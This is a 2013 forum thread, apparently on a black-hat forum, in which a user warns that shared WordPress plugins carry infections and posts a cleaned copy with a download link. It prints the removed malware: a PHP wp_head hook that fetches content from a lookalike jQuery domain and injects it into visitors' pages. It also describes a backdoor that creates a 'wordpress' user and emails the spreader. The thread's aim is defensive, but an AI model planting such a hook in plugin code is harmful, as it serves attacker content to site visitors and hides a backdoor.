04-29-2013, 07:02 PM
04-29-2013, 09:09 PM
(04-29-2013 06:29 PM)simey69 Wrote: [ -> ]Hi,How about your site login details handed over to hacker/coder
I will check it and past back soon
cheers,
Si
or corrupting your wp site... or some nasty unwanted message
posted on your site!
Infected plugins can do that!
04-29-2013, 10:35 PM
Right now...
There is one very common infection of wp plugins and themes, this fetches offsite content from another (host) site and injects content into the page as the visitor see it.
I've seen payloads vary from simple backlinks, adverts, cpa actions right up to blackole virus delivery.
This infection will not damage or hurt your wp installation, as the action of the payload is towards the visitor.
This can hurt your site by being flagged as dangerours site, seen as spammy due to content or cause you to lose visitors.
We refer to this as a wp_head infection typically, as that is the mechanism mostly used to inject the code into the served page, but very similar mechanisms are used.
This infection may live in any part of the plugin or theme, but is typically in functions.php
A lesser and more devious infection creates a new user on your site, then emails the infection spreader with a quick message to let them know you've been hit.
After that, it's a manual process of them coming to your site and doing what they want really...
That may be breaking your site or infecting it, then offering to fix it for a fee.
It may be a total site hijack, locking you out
It may be to allow them to add content, plugins etc to scatter their backlinks, adverts, cpa campaigns etc
One of these I reported yesterday was encoded in the plugin (typical) but blended with actual code of the plugin also, so by a simple removal of the encrypted data, it would break the wp installation..
So yes, you can do a lot of damage to a wp installation via plugin or theme.
The idiot scammers that do this vary from dead-head script kiddies that can't even copy the infection, so breaking the plugin/theme - even before the code can do its thing -- right up to more intelligent attempts that try really hard to hide their tracks and avoid detection.
Right now, as far as I'm concerned, the only real way to scan and clean them is manually - VT and other scanners are useless against such infections, as it looks like usual safe code if done correctly, the muppets that heavily encode it usually trigger an obfuscated script alert, giving it away a little...
The people that get banned share many infected files, usually using the same mechanism and same host domain for the payload code that is fetched.
The date of the infection can be spotted in the archive and is usually within an hour or so to a few days of their share date.
Hope that helps a little?
Si
There is one very common infection of wp plugins and themes, this fetches offsite content from another (host) site and injects content into the page as the visitor see it.
I've seen payloads vary from simple backlinks, adverts, cpa actions right up to blackole virus delivery.
This infection will not damage or hurt your wp installation, as the action of the payload is towards the visitor.
This can hurt your site by being flagged as dangerours site, seen as spammy due to content or cause you to lose visitors.
We refer to this as a wp_head infection typically, as that is the mechanism mostly used to inject the code into the served page, but very similar mechanisms are used.
This infection may live in any part of the plugin or theme, but is typically in functions.php
A lesser and more devious infection creates a new user on your site, then emails the infection spreader with a quick message to let them know you've been hit.
After that, it's a manual process of them coming to your site and doing what they want really...
That may be breaking your site or infecting it, then offering to fix it for a fee.
It may be a total site hijack, locking you out
It may be to allow them to add content, plugins etc to scatter their backlinks, adverts, cpa campaigns etc
One of these I reported yesterday was encoded in the plugin (typical) but blended with actual code of the plugin also, so by a simple removal of the encrypted data, it would break the wp installation..
So yes, you can do a lot of damage to a wp installation via plugin or theme.
The idiot scammers that do this vary from dead-head script kiddies that can't even copy the infection, so breaking the plugin/theme - even before the code can do its thing -- right up to more intelligent attempts that try really hard to hide their tracks and avoid detection.
Right now, as far as I'm concerned, the only real way to scan and clean them is manually - VT and other scanners are useless against such infections, as it looks like usual safe code if done correctly, the muppets that heavily encode it usually trigger an obfuscated script alert, giving it away a little...
The people that get banned share many infected files, usually using the same mechanism and same host domain for the payload code that is fetched.
The date of the infection can be spotted in the archive and is usually within an hour or so to a few days of their share date.
Hope that helps a little?
Si
04-30-2013, 01:25 PM
Great work!Good Luck!
05-02-2013, 05:44 PM
** URGENT UPDATE **
Thanks to Jaffy, another infection inside the share has been questioned and found to be present.
It is an email infection, creating a new user and informing the scammer behind the infection that the backdoor has been created.
this infection sends an email with subject 'Wordpress Plugin covertplayer' to
Obviously, feel free to abuse and destroy that email user as much as possible...
To check if you have been hit:
Check your wp installation for a user called wordpress
if found - at least change that user password - even better delete it totally
then check for any unexpected posts, plugins, theme changes etc
new CLEANED version available here:
password.. bestblackhatforum
There are a few of these threads about, so I've repeated this post on the other one also, to ensure the clean release is available
Cheers,
Si
Thanks to Jaffy, another infection inside the share has been questioned and found to be present.
It is an email infection, creating a new user and informing the scammer behind the infection that the backdoor has been created.
this infection sends an email with subject 'Wordpress Plugin covertplayer' to
Code:
phillychad@gmx.comTo check if you have been hit:
Check your wp installation for a user called wordpress
if found - at least change that user password - even better delete it totally
then check for any unexpected posts, plugins, theme changes etc
new CLEANED version available here:
Magic Button :
Code:
http://www.sendspace.com/file/pedayzThere are a few of these threads about, so I've repeated this post on the other one also, to ensure the clean release is available
Cheers,
Si
05-03-2013, 08:37 PM
Hi Simey
just downloaded and unzipped and this looks exactly the same as the version I originally downloaded with the base64 encoded central.class php - whats been cleaned?
just downloaded and unzipped and this looks exactly the same as the version I originally downloaded with the base64 encoded central.class php - whats been cleaned?
05-03-2013, 10:53 PM
Hi,
I've just checked the before and after versions..
The one I shared has the infection removed from seo-pressor.php (near base of file)
code removed:
I'm just checking the central.class file now, will report back asap
Cheers,
Si
I've just checked the before and after versions..
The one I shared has the infection removed from seo-pressor.php (near base of file)
code removed:
Code:
//Adds JQuery dependency.
function wp__head() {
if(function_exists('curl_init'))
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'wp__head');I'm just checking the central.class file now, will report back asap
Cheers,
Si
05-03-2013, 11:21 PM
ok, yes, the central class encoded code did hold a further infection.
it's an email infection, creating an new user and contacting the scammer who spreads it.
Please see my modified post here:
http://bestblackhatforum.com/Thread-GET-...#pid371579
for fully cleaned code and explanation on checking if you have been hit or not by this attack.
+Rep to jaffy for raising the alert
Cheers,
Si
it's an email infection, creating an new user and contacting the scammer who spreads it.
Please see my modified post here:
http://bestblackhatforum.com/Thread-GET-...#pid371579
for fully cleaned code and explanation on checking if you have been hit or not by this attack.
+Rep to jaffy for raising the alert
Cheers,
Si
05-04-2013, 12:18 AM
Tnh man :)
05-04-2013, 01:39 AM
Thanks Si
Looks and installs great. No extra users!
Thanks for your hard work and response. rep added
Looks and installs great. No extra users!
Thanks for your hard work and response. rep added